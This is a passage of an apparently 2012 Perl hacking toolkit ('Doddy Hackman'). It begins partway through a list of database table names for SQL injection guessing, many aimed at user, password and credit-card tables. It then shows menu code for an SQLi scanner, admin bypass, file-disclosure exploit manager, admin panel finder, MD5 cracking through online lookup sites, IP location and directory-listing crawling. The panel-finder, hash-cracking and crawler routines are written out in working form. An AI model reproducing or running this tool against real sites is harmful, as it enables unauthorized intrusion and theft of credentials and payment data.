  743.     'pma_table_info',                'poll_user',
  744.     'punbb_users',                   'pwds',
  745.     'reg_user',                      'reg_users',
  746.     'registered',                    'reguser',
  747.     'regusers',                      'session',
  748.     'sessions',                      'settings',
  749.     'shop.cards',                    'shop.orders',
  750.     'site_login',                    'site_logins',
  751.     'sitelogin',                     'sitelogins',
  752.     'sites',                         'smallnuke_members',
  753.     'smf_members',                   'SS_orders',
  754.     'statistics',                    'superuser',
  755.     'sysadmins',                     'system',
  756.     'sysuser',                       'sysusers',
  757.     'table',                         'tables',
  758.     'tb_admin',                      'tb_administrator',
  759.     'tb_login',                      'tb_member',
  760.     'tb_members',                    'tb_user',
  761.     'tb_username',                   'tb_usernames',
  762.     'tb_users',                      'tbl',
  763.     'tbl_user',                      'tbl_users',
  764.     'tbluser',                       'tbl_clients',
  765.     'tbl_client',                    'tblclients',
  766.     'tblclient',                     'test',
  767.     'usebb_members',                 'user_admin',
  768.     'user_info',                     'user_list',
  769.     'user_logins',                   'user_names',
  770.     'usercontrol',                   'userinfo',
  771.     'userlist',                      'userlogins',
  772.     'usernames',                     'userrights',
  773.     'users',                         'vb_user',
  774.     'vbulletin_session',             'vbulletin_user',
  775.     'voodoo_members',                'webadmin',
  776.     'webadmins',                     'webmaster',
  777.     'webmasters',                    'webuser',
  778.     'webusers',                      'x_admin',
  779.     'xar_roles',                     'xoops_bannerclient',
  780.     'xoops_users',                   'yabb_settings',
  781.     'yabbse_settings',               'ACT_INFO',
  782.     'ActiveDataFeed',                'Category',
  783.     'CategoryGroup',                 'ChicksPass',
  784.     'ClickTrack',                    'Country',
  785.     'CountryCodes1',                 'CustomNav',
  786.     'DataFeedPerformance1',          'DataFeedPerformance2',
  787.     'DataFeedPerformance2_incoming', 'DataFeedShowtag1',
  788.     'DataFeedShowtag2',              'DataFeedShowtag2_incoming',
  789.     'dtproperties',                  'Event',
  790.     'Event_backup',                  'Event_Category',
  791.     'EventRedirect',                 'Events_new',
  792.     'Genre',                         'JamPass',
  793.     'MyTicketek',                    'MyTicketekArchive',
  794.     'News',                          'PerfPassword',
  795.     'PerfPasswordAllSelected',       'Promotion',
  796.     'ProxyDataFeedPerformance',      'ProxyDataFeedShowtag',
  797.     'ProxyPriceInfo',                'Region',
  798.     'SearchOptions',                 'Series',
  799.     'Sheldonshows',                  'StateList',
  800.     'States',                        'SubCategory',
  801.     'Subjects',                      'Survey',
  802.     'SurveyAnswer',                  'SurveyAnswerOpen',
  803.     'SurveyQuestion',                'SurveyRespondent',
  804.     'sysconstraints',                'syssegments',
  805.     'tblRestrictedPasswords',        'tblRestrictedShows',
  806.     'TimeDiff',                      'Titles',
  807.     'ToPacmail1',                    'ToPacmail2',
  808.     'UserPreferences',               'uvw_Category',
  809.     'uvw_Pref',                      'uvw_Preferences',
  810.     'Venue',                         'venues',
  811.     'VenuesNew',                     'X_3945',
  812.     'tblArtistCategory',             'tblArtists',
  813.     'tblConfigs',                    'tblLayouts',
  814.     'tblLogBookAuthor',              'tblLogBookEntry',
  815.     'tblLogBookImages',              'tblLogBookImport',
  816.     'tblLogBookUser',                'tblMails',
  817.     'tblNewCategory',                'tblNews',
  818.     'tblOrders',                     'tblStoneCategory',
  819.     'tblStones',                     'tblUser',
  820.     'tblWishList',                   'VIEW1',
  821.     'viewLogBookEntry',              'viewStoneArtist',
  822.     'vwListAllAvailable',            'CC_info',
  823.     'CC_username',                   'cms_user',
  824.     'cms_users',                     'cms_admin',
  825.     'cms_admins',                    'jos_user',
  826.     'table_user',                    'bulletin',
  827.     'cc_info',                       'login_name',
  828.     'admuserinfo',                   'userlistuser_list',
  829.     'SiteLogin',                     'Site_Login',
  830.     'UserAdmin',                     'Admins',
  831.     'Login',                         'Logins'
  832. );
  833.  
  834. ##
  835.  
  836. my $nave = LWP::UserAgent->new;
  837. $nave->agent(
  838. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  839. );
  840. $nave->timeout(10);
  841.  
  842. ##Test Proxy
  843.  
  844. my $now_proxy;
  845. my $te = getdatanownownownow();
  846.  
  847. if ( $te =~ /proxy=(.*)/ ) {
  848.     $now_proxy = $1;
  849.     $nave->proxy( "http", "http://" . $now_proxy );
  850. }
  851.  
  852. ##
  853.  
  854. #Inicio
  855.  
  856. inicio_total();
  857.  
  858. sub inicio_total {
  859.  
  860.     head_menu();
  861.  
  862.     unless ( -f "data.txt" ) {
  863.         instalar();
  864.     }
  865.     else {
  866.  
  867.         #Start the menu
  868.         my $re = menu_login();
  869.         printear( "\n\n\t\t\t[+] Checking ...\n", "text", "7", "5" );
  870.         sleep(3);
  871.         if ( $re eq "yes" ) {
  872.             estoydentro();
  873.         }
  874.         else {
  875.             printear( "\n\n\t\t\t[-] Bad Login\n\n\n", "text", "5", "5" );
  876.             <stdin>;
  877.             inicio_total();
  878.         }
  879.     }
  880.     copyright_menu();
  881. }
  882.  
  883. #Final
  884.  
  885. sub estoydentro {
  886.     head_menu();
  887.     menu_central();
  888.     my $op = printear( "\n\n\t\t\t[+] Option : ", "stdin", "11", "13" );
  889.     $SIG{INT} = \&estoydentroporahora; ## Comment on this line to compile to exe
  890.     if ( $op eq "1" ) {
  891.         load_paranoic_old();
  892.     }
  893.     elsif ( $op eq "2" ) {
  894.         load_kobra();
  895.     }
  896.     elsif ( $op eq "3" ) {
  897.         load_bypass();
  898.     }
  899.     elsif ( $op eq "4" ) {
  900.         load_fsd();
  901.     }
  902.     elsif ( $op eq "5" ) {
  903.         load_findpaths();
  904.     }
  905.     elsif ( $op eq "6" ) {
  906.         load_locateip();
  907.     }
  908.     elsif ( $op eq "7" ) {
  909.         menu_crackhash();
  910.         printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  911.         <stdin>;
  912.         estoydentro();
  913.     }
  914.     elsif ( $op eq "8" ) {
  915.         clean();
  916.         start_panel();
  917.     }
  918.     elsif ( $op eq "9" ) {
  919.         load_cmd();
  920.     }
  921.     elsif ( $op eq "10" ) {
  922.         head_menu();
  923.         printear(
  924. "\n\n\t\tThis program was coded By Doddy H in the year 2012\n\n\n\n",
  925.             "text", "13", "5"
  926.         );
  927.         <stdin>;
  928.         estoydentro();
  929.     }
  930.     elsif ( $op eq "11" ) {
  931.         my $op = printear( "\n\n\n\t\t\t[+] Good Bye", "stdin", "7", "13" );
  932.  
  933.         #<stdin>;
  934.         exit(1);
  935.     }
  936.     else {
  937.         estoydentro();
  938.     }    #Fin de control
  939. }
  940.  
  941. sub estoydentroporahora {
  942.     my $op = printear( "\n\n\n\t\t[+] Press any key for return to the menu",
  943.         "stdin", "7", "13" );
  944.  
  945.     #<stdin>;
  946.     estoydentro();
  947. }
  948.  
  949. sub menu_central {
  950.     printear( "\n\n\t\t\t -- == Options == --\n\n", "text", "13", "5" );
  951.     printear(
  952.         "\n
  953. \t\t\t[+] 1 : Web Scanner\n
  954. \t\t\t[+] 2 : SQLi Scanner\n
  955. \t\t\t[+] 3 : Bypass Admin\n
  956. \t\t\t[+] 4 : FSD Exploit Manager\n
  957. \t\t\t[+] 5 : Paths Finder\n
  958. \t\t\t[+] 6 : Locate IP\n
  959. \t\t\t[+] 7 : Crack MD5\n
  960. \t\t\t[+] 8 : Panel Finder\n
  961. \t\t\t[+] 9 : CMD\n
  962. \t\t\t[+] 10 : About\n
  963. \t\t\t[+] 11 : Exit\n
  964. ", "text", "13", "5"
  965.     );
  966. }
  967.  
  968. sub menu_login {
  969.  
  970.     my $test_username = "";
  971.     my $test_password = "";
  972.  
  973.     printear( "\n\n\t\t\t-- == Login == --\n\n\n\n", "text", "13", "5" );
  974.     my $username = printear( "\t\t\t[+] Username : ",   "stdin", "11", "13" );
  975.     my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );
  976.  
  977.     my $word = getdatanownownownow();
  978.  
  979.     if ( $word =~ /username=(.*)/ ) {
  980.         $test_username = $1;
  981.     }
  982.  
  983.     if ( $word =~ /password=(.*)/ ) {
  984.         $test_password = $1;
  985.     }
  986.  
  987.     if (    $test_username eq md5_hex($username)
  988.         and $test_password eq md5_hex($password) )
  989.     {
  990.         return "yes";
  991.     }
  992.     else {
  993.         return "no";
  994.     }
  995.  
  996. }
  997.  
  998. sub instalar {
  999.     printear( "\n\n\t\t\t-- == Program settings == --\n\n\n\n",
  1000.         "text", "13", "5" );
  1001.  
  1002.     my $username = printear( "\t\t\t[+] Username : ",   "stdin", "11", "13" );
  1003.     my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" );
  1004.     my $proxy    = printear( "\n\t\t\t[+] Proxy : ",    "stdin", "11", "13" );
  1005.     my $colores =
  1006.       printear( "\n\t\t\t[+] Colors [y,n] : ", "stdin", "11", "13" );
  1007.  
  1008.     open( FILE, ">>data.txt" );
  1009.     print FILE "username=" . md5_hex($username) . "\n";
  1010.     print FILE "password=" . md5_hex($password) . "\n";
  1011.     if ( $proxy ne "" ) {
  1012.         print FILE "proxy=" . $proxy . "\n";
  1013.     }
  1014.     print FILE "colors=" . $colores . "\n";
  1015.     close FILE;
  1016.  
  1017.     inicio_total();
  1018. }
  1019.  
  1020. sub head_menu {
  1021.     clean();
  1022.     printear( "
  1023.  
  1024.  
  1025. @@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
  1026. @  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
  1027. @  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
  1028. @@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
  1029. @    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
  1030. @    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
  1031. @@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @
  1032.  
  1033.  
  1034. ", "text", "11", "5" );
  1035.  
  1036.     printear( "
  1037.  
  1038.                                          
  1039.                                          
  1040. \t\t                 ¾¾¾¾¾¾¾¾¾¾¾              
  1041. \t\t              Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾          
  1042. \t\t            Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾          
  1043. \t\t          Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾        
  1044. \t\t          Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾        
  1045. \t\t         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  1046. \t\t        Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾      
  1047. \t\t        Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾      
  1048. \t\t        Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾      
  1049. \t\t         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
  1050. \t\t         ¾¾¾¾¾¾¾  Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾    Â¾Â¾Â¾Â¾      
  1051. \t\t          Â¾Â¾Â¾Â¾       ¾¾¾¾¾¾      Â¾Â¾Â¾Â¾      
  1052. \t\t           ¾¾¾      Â¾Â¾Â¾ ¾¾¾      Â¾Â¾Â¾        
  1053. \t\t           ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾        
  1054. \t\t            Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾     ¾¾¾¾¾¾¾¾¾        
  1055. \t\t            Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾  Â¾  Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾        
  1056. \t\t            Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾        
  1057. \t\t                 ¾¾¾¾¾¾¾¾¾¾¾¾¾              
  1058. \t\t               ¾  Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾  Â¾            
  1059. \t\t               ¾    Â¾ ¾¾¾¾ ¾  Â¾            
  1060. \t\t               ¾ ¾¾          Â¾Â¾            
  1061. \t\t      Â¾Â¾Â¾      Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾            
  1062. \t\t     ¾¾¾¾¾      Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾      Â¾Â¾Â¾    
  1063. \t\t     ¾¾¾¾¾¾¾      Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾      Â¾Â¾Â¾Â¾Â¾Â¾  
  1064. \t\t     ¾¾¾¾¾¾¾¾¾¾      Â¾Â¾Â¾         ¾¾¾¾¾¾¾¾¾  
  1065. \t\t      Â¾Â¾Â¾  Â¾Â¾Â¾Â¾Â¾Â¾             ¾¾¾¾¾¾¾¾¾¾¾  
  1066. \t\t               ¾¾¾¾¾¾     ¾¾¾¾¾¾¾          
  1067. \t\t                  Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾              
  1068. \t\t                   ¾¾¾¾¾¾¾¾¾                
  1069. \t\t                Â¾Â¾Â¾Â¾Â¾Â¾Â¾ ¾¾¾¾¾¾¾            
  1070. \t\t            Â¾Â¾Â¾Â¾Â¾Â¾Â¾         ¾¾¾¾¾¾¾        
  1071. \t\t        Â¾Â¾Â¾Â¾Â¾Â¾Â¾                Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾Â¾  
  1072. \t\t   ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
  1073. \t\t   ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
  1074. \t\t    Â¾Â¾Â¾Â¾                             ¾¾¾¾  
  1075.                                          
  1076.                                          
  1077.                                          
  1078.  
  1079.  
  1080. ", "text", "7", "5" );
  1081.  
  1082. }
  1083.  
  1084. sub printear {    #
  1085.     my $test;
  1086.     my $word = getdatanownownownow();
  1087.  
  1088.     if ( $word =~ /colors=(.*)/ ) {
  1089.         $test = $1;
  1090.     }
  1091.     if ( $test eq "y" ) {
  1092.         if ( $_[1] eq "text" ) {
  1093.             cprint( "\x03" . $_[2] . $_[0] . "\x030" );
  1094.         }
  1095.         elsif ( $_[1] eq "stdin" ) {
  1096.             if ( $_[3] ne "" ) {
  1097.                 cprint( "\x03" . $_[2] . $_[0] . "\x030" . "\x03" . $_[3] );
  1098.                 my $op = <stdin>;
  1099.                 chomp $op;
  1100.                 cprint("\x030");
  1101.                 return $op;
  1102.             }
  1103.         }
  1104.         else {
  1105.             print "error\n";
  1106.         }
  1107.     }
  1108.     else {    #
  1109.         if ( $_[1] eq "text" ) {
  1110.             print( $_[0] );
  1111.         }
  1112.         elsif ( $_[1] eq "stdin" ) {
  1113.             if ( $_[3] ne "" ) {
  1114.                 cprint( $_[0] );
  1115.                 my $op = <stdin>;
  1116.                 chomp $op;
  1117.                 return $op;
  1118.             }
  1119.         }
  1120.     }
  1121. }    #Fin de printear
  1122.  
  1123. sub clean {
  1124.     my $os = $^O;
  1125.     if ( $os =~ /Win32/ig ) {
  1126.         system("cls");
  1127.     }
  1128.     else {
  1129.         system("clear");
  1130.     }
  1131. }
  1132.  
  1133. sub copyright_menu {
  1134.     printear( "\n\n\t\t\t(C) Doddy Hackman 2012\n\n", "text", "11", "5" );
  1135.     exit(1);
  1136. }
  1137.  
  1138. ##Funciones del programa ##
  1139.  
  1140. sub start_panel {
  1141.  
  1142.     head_panel();
  1143.     my $page  = printear( "[+] Page : ",    "stdin", "11", "13" );
  1144.     my $count = printear( "\n[+] Count : ", "stdin", "11", "13" );
  1145.  
  1146.     if ( $count eq "" ) {
  1147.         $count = 3;
  1148.     }
  1149.  
  1150.     scan_panel( $page, $count );
  1151.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1152.     <stdin>;
  1153.     estoydentro();
  1154.  
  1155. }
  1156.  
  1157. sub scan_panel {
  1158.  
  1159.     my $count = 0;
  1160.  
  1161.     printear( "\n\n[+] Searching .....\n\n\n", "text", "13", "5" );
  1162.  
  1163.     for my $path (@paneles) {
  1164.  
  1165.         if ( $count eq $_[1] ) {
  1166.             last;
  1167.         }
  1168.  
  1169.         $code = tomados( $_[0] . "/" . $path );
  1170.  
  1171.         if ( $code->is_success ) {
  1172.             $controlt = 1;
  1173.             $count++;
  1174.             printear(
  1175.                 "\a\a[Link] : " . $_[0] . "/" . $path . "\n", "text",
  1176.                 "7",                                          "5"
  1177.             );
  1178.  
  1179.             #savefile("admins_logs.txt",$_[0]."/".$path);
  1180.         }
  1181.  
  1182.     }
  1183.  
  1184.     if ( $controlt ne 1 ) {
  1185.         printear( "[-] Not found anything\n", "text", "5", "5" );
  1186.     }
  1187.  
  1188. }    ##
  1189.  
  1190. sub head_panel {
  1191.     printear( "
  1192.  
  1193.  
  1194. @@@@@                    @     @@@@                          @
  1195. @    @                   @    @    @             @           @
  1196. @    @                   @    @                  @           @
  1197. @    @  @@@  @ @@   @@@  @    @       @@@  @ @@  @@ @@  @@@  @
  1198. @@@@@      @ @@  @ @   @ @    @      @   @ @@  @ @  @  @   @ @
  1199. @       @@@@ @   @ @@@@@ @    @      @   @ @   @ @  @  @   @ @
  1200. @      @   @ @   @ @     @    @      @   @ @   @ @  @  @   @ @
  1201. @      @   @ @   @ @   @ @    @    @ @   @ @   @ @  @  @   @ @
  1202. @       @@@@ @   @  @@@  @     @@@@   @@@  @   @  @ @   @@@  @
  1203.  
  1204.  
  1205.                                                    
  1206. ", "text", "7", "5" );
  1207. }
  1208.  
  1209. sub menu_crackhash {
  1210.  
  1211.     head_crackhash();
  1212.  
  1213.     my $op = printear( "[+] Option : ", "stdin", "11", "13" );
  1214.  
  1215.     if ( $op eq "1" ) {
  1216.         my $ha = printear( "\n\n[+] Hash : ", "stdin", "11", "13" );
  1217.         if ( ver_length($ha) ) {
  1218.             printear( "\n\n[+] Cracking Hash...\n", "text", "13", "5" );
  1219.             my $re = crackit($ha);
  1220.             unless ( $re =~ /false01/ ) {
  1221.                 printear( "\n\n[+] Cracked : $re\n\n", "text", "7", "5" );
  1222.                 savefile( "hashes-found.txt", $ha . ":" . $re );
  1223.             }
  1224.             else {
  1225.                 printear( "\n[-] Not Found\n\n", "text", "5", "5" );
  1226.             }
  1227.         }
  1228.         else {
  1229.             printear( "\n\n[-] Hash invalid\n\n", "text", "5", "5" );
  1230.         }
  1231.         printear( "\n[+] Finished", "text", "13", "5" );
  1232.         <stdin>;
  1233.         menu_crackhash();
  1234.     }
  1235.     if ( $op eq "2" ) {
  1236.         my $fi = printear( "\n\n[+] Wordlist : ", "stdin", "11", "13" );
  1237.         if ( -f $fi ) {
  1238.             printear( "\n\n[+] Opening File\n", "text", "13", "5" );
  1239.             open( WORD, $fi );
  1240.             my @varios = <WORD>;
  1241.             close WORD;
  1242.             my @varios = repes(@varios);
  1243.             printear( "[+] Hashes Found : " . int(@varios), "text", "13", "5" );
  1244.             printear( "\n\n[+] Cracking hashes...\n\n",     "text", "13", "5" );
  1245.             for $hash (@varios) {
  1246.                 chomp $hash;
  1247.                 if ( ver_length($hash) ) {
  1248.                     my $re = crackit($hash);
  1249.                     unless ( $re =~ /false01/ ) {
  1250.                         printear( "[+] $hash : $re\n", "text", "7", "5" );
  1251.                         savefile( "hashes-found.txt", $hash . ":" . $re );
  1252.                     }
  1253.                 }
  1254.             }
  1255.         }
  1256.         else {
  1257.             printear( "\n\n[-] File Not Found\n\n", "text", "5", "5" );
  1258.         }
  1259.         printear( "\n[+] Finished", "text", "13", "5" );
  1260.         <stdin>;
  1261.         menu_crackhash();
  1262.     }
  1263.     if ( $op eq "3" ) {
  1264.         printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1265.         <stdin>;
  1266.         estoydentro();
  1267.     }
  1268. }
  1269.  
  1270. sub crackit {
  1271.  
  1272.     my $target = shift;
  1273.  
  1274.     chomp $target;
  1275.  
  1276.     my %hash = (
  1277.  
  1278.         'http://md5.hashcracking.com/search.php?md5=' => {
  1279.             'tipo'  => 'get',
  1280.             'regex' => "Cleartext of $target is (.*)",
  1281.         },
  1282.  
  1283.         'http://www.hashchecker.com/index.php?_sls=search_hash' => {
  1284.             'variables' => { 'search_field' => $target, 'Submit' => 'search' },
  1285.             'regex' =>
  1286.               "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
  1287.         },
  1288.  
  1289.         'http://md5.rednoize.com/?q=' => {
  1290.             'tipo'  => 'get',
  1291.             'regex' => "<div id=\"result\" >(.*)<\/div>"
  1292.         },
  1293.  
  1294.         'http://md52.altervista.org/index.php?md5=' => {
  1295.             'tipo'  => 'get',
  1296.             'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
  1297.           }
  1298.  
  1299.     );
  1300.  
  1301.     for my $data ( keys %hash ) {
  1302.         if ( $hash{$data}{tipo} eq "get" ) {
  1303.             $code = toma( $data . $target );
  1304.             if ( $code =~ /$hash{$data}{regex}/ig ) {
  1305.                 my $found = $1;
  1306.                 unless ( $found =~ /\[Non Trovata\]/ ) {
  1307.                     return $found;
  1308.                     last;
  1309.                 }
  1310.             }
  1311.         }
  1312.         else {
  1313.             $code = tomar( $data, $hash{$data}{variables} );
  1314.             if ( $code =~ /$hash{$data}{regex}/ig ) {
  1315.                 my $found = $1;
  1316.                 return $found;
  1317.                 last;
  1318.             }
  1319.         }
  1320.     }
  1321.     return "false01";
  1322. }
  1323.  
  1324. sub head_crackhash {
  1325.     clean();
  1326.     printear( "
  1327.  
  1328.  
  1329. ##########  #########  #########     #####   #    ###  ###
  1330. #  # #  ##  #  #   #   #  # #  #     #  #   #   #  # #  #
  1331. #    #  ##  #  #    #  #    #  #     #  #  # #  #    #  
  1332. ###  #  # # #  #    #  ###  ###      ###   # #   ##   ##
  1333. #    #  # # #  #    #  #    # #      #    #####    #    #
  1334. #    #  #  ##  #   #   #  # #  #     #    #   # #  # #  #
  1335. ###  ######  # #####   ########  #   ###  ### ######  ###
  1336.  
  1337.  
  1338.  
  1339. ", "text", "5", "5" );
  1340.     printear( "
  1341. [++] Options
  1342.  
  1343.  
  1344. [+] 1 : Hash
  1345. [+] 2 : File with hashes
  1346. [+] 3 : Exit
  1347.  
  1348.  
  1349. ", "text", "3", "5" );
  1350. }    ##
  1351.  
  1352. sub load_locateip {
  1353.  
  1354.     head_locateip();
  1355.     my $page = printear( "[+] Page : ", "stdin", "11", "13" );
  1356.     infocon($page);
  1357.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1358.     <stdin>;
  1359.     estoydentro();
  1360.  
  1361.     sub head_locateip {
  1362.         clean();
  1363.         printear( "
  1364.  
  1365.  
  1366.  
  1367. @      @@@@    @@@@    @    @@@@@  @@@@@     @  @@@@@
  1368. @     @    @  @    @   @      @    @         @  @    @
  1369. @     @    @  @       @ @     @    @         @  @    @
  1370. @     @    @  @       @ @     @    @         @  @    @
  1371. @     @    @  @      @   @    @    @@@@      @  @@@@@
  1372. @     @    @  @      @   @    @    @         @  @    
  1373. @     @    @  @      @@@@@    @    @         @  @    
  1374. @     @    @  @    @@     @   @    @         @  @    
  1375. @@@@@  @@@@    @@@@ @     @   @    @@@@@     @  @    
  1376.  
  1377.  
  1378.  
  1379. ", "text", "7", "5" );
  1380.     }
  1381.  
  1382.     sub infocon {
  1383.         my $target = shift;
  1384.  
  1385.         my $get    = gethostbyname($target);
  1386.         my $target = inet_ntoa($get);
  1387.  
  1388.         printear( "\n\n[+] Getting info\n\n\n", "text", "13", "5" );
  1389.  
  1390.         $total =
  1391.           "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
  1392.         $re = toma($total);
  1393.  
  1394.         if ( $re =~ /City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1395.             printear( "[+] City : $2\n", "text", "7", "5" );
  1396.         }
  1397.         else {
  1398.             printear( "[-] Not Found\n",      "text", "5",  "5" );
  1399.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1400.             <stdin>;
  1401.             estoydentro();
  1402.         }
  1403.         if ( $re =~ /Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1404.             printear( "[+] Country : $2\n", "text", "7", "5" );
  1405.         }
  1406.         if ( $re =~ /State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/ ) {
  1407.             printear( "[+] State or Region : $2\n", "text", "7", "5" );
  1408.         }
  1409.  
  1410.         printear( "\n\n[+] Getting Hosts\n\n\n", "text", "13", "5" );
  1411.  
  1412.         my $code = toma( "http://www.ip-adress.com/reverse_ip/" . $target );
  1413.  
  1414.         while ( $code =~ /whois\/(.*?)\">Whois/g ) {
  1415.             my $dns = $1;
  1416.             chomp $dns;
  1417.             printear( "[DNS] : $dns\n", "text", "7", "5" );
  1418.         }
  1419.     }
  1420.  
  1421. }    ##
  1422.  
  1423. ##
  1424.  
  1425. sub load_findpaths {
  1426.  
  1427.     head_paths();
  1428.     my $web = printear( "[+] Web : ", "stdin", "11", "13" );
  1429.     printear( "\n\n[+] Scan Type\n\n", "text", "5", "5" );
  1430.     printear( "[+] 1 : Fast\n",        "text", "3", "5" );
  1431.     printear( "[+] 2 : Full\n",        "text", "3", "5" );
  1432.     my $op = printear( "\n\n[+] Option : ", "stdin", "11", "13" );
  1433.     printear( "\n\n[+] Scanning ....\n\n\n", "text", "13", "5" );
  1434.  
  1435.     if ( $op eq "1" ) {
  1436.         simple($web);
  1437.     }
  1438.     elsif ( $op eq "2" ) {
  1439.         escalar($web);
  1440.     }
  1441.     else {
  1442.         simplex($web);
  1443.     }
  1444.     printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  1445.     <stdin>;
  1446.     estoydentro();
  1447.  
  1448.     sub escalar {
  1449.  
  1450.         my $co    = $_[0];
  1451.         my $code  = toma( $_[0] );
  1452.         my @links = get_links($code);
  1453.  
  1454.         if ( $code =~ /Index of (.*)/ig ) {
  1455.             printear( "[+] Link : $co\n", "text", "7", "5" );
  1456.             savefile( "paths-logs.txt", $co );
  1457.             my $dir_found = $1;
  1458.             chomp $dir_found;
  1459.             while ( $code =~ /<a href=\"(.*)\">(.*)<\/a>/ig ) {
  1460.                 my $ruta   = $1;
  1461.                 my $nombre = $2;
  1462.                 unless ( $nombre =~ /Parent Directory/ig
  1463.                     or $nombre =~ /Description/ig )
  1464.                 {
  1465.                     push( @encontrados, $_[0] . "/" . $nombre );
  1466.                 }
  1467.             }
  1468.         }
  1469.  
  1470.         for my $com (@links) {
  1471.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  1472.             if ( $path =~ /\/(.*)$/ ) {
  1473.                 my $path1 = $1;
  1474.                 $_[0] =~ s/$path1//ig;
  1475.                 my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  1476.                 if ( $path =~ /(.*)\// ) {
  1477.                     my $parche = $1;
  1478.                     unless ( $repetidos =~ /$parche/ ) {
  1479.                         $repetidos .= " " . $parche;
  1480.                         my $yeah = "http://" . $auth . $parche;
  1481.                         escalar($yeah);
  1482.                     }
  1483.                 }
  1484.                 for (@encontrados) {
  1485.                     escalar($_);
  1486.                 }
  1487.             }
  1488.         }
  1489.     }
  1490.  
  1491.     sub simplex {
  1492.  
  1493.         my $code  = toma( $_[0] );
  1494.         my @links = get_links($code);
  1495.  
  1496.         for my $com (@links) {
  1497.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  1498.             if ( $path =~ /\/(.*)$/ ) {
  1499.                 my $path1 = $1;
  1500.                 $_[0] =~ s/$path1//ig;
  1501.                 my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  1502.                 if ( $path =~ /(.*)\// ) {
  1503.                     my $parche = $1;
  1504.                     unless ( $repetidos =~ /$parche/ ) {
  1505.                         $repetidos .= " " . $parche;
  1506.                         my $code = toma( "http://" . $auth . $parche );
  1507.  
  1508.                         if ( $code =~ /Index of (.*)</ig ) {
  1509.                             my $dir_found = $1;
  1510.                             chomp $dir_found;
  1511.                             my $yeah = "http://" . $auth . $parche;
  1512.                             printear( "[+] Link : $yeah\n", "text", "7", "5" );
  1513.                             savefile( "paths-logs.txt", $yeah );
  1514.                         }
  1515.                     }
  1516.                 }
  1517.             }
  1518.         }
  1519.     }
  1520.  
  1521.     sub head_paths {
  1522.         clean();
  1523.         printear( "
  1524.  
  1525.  
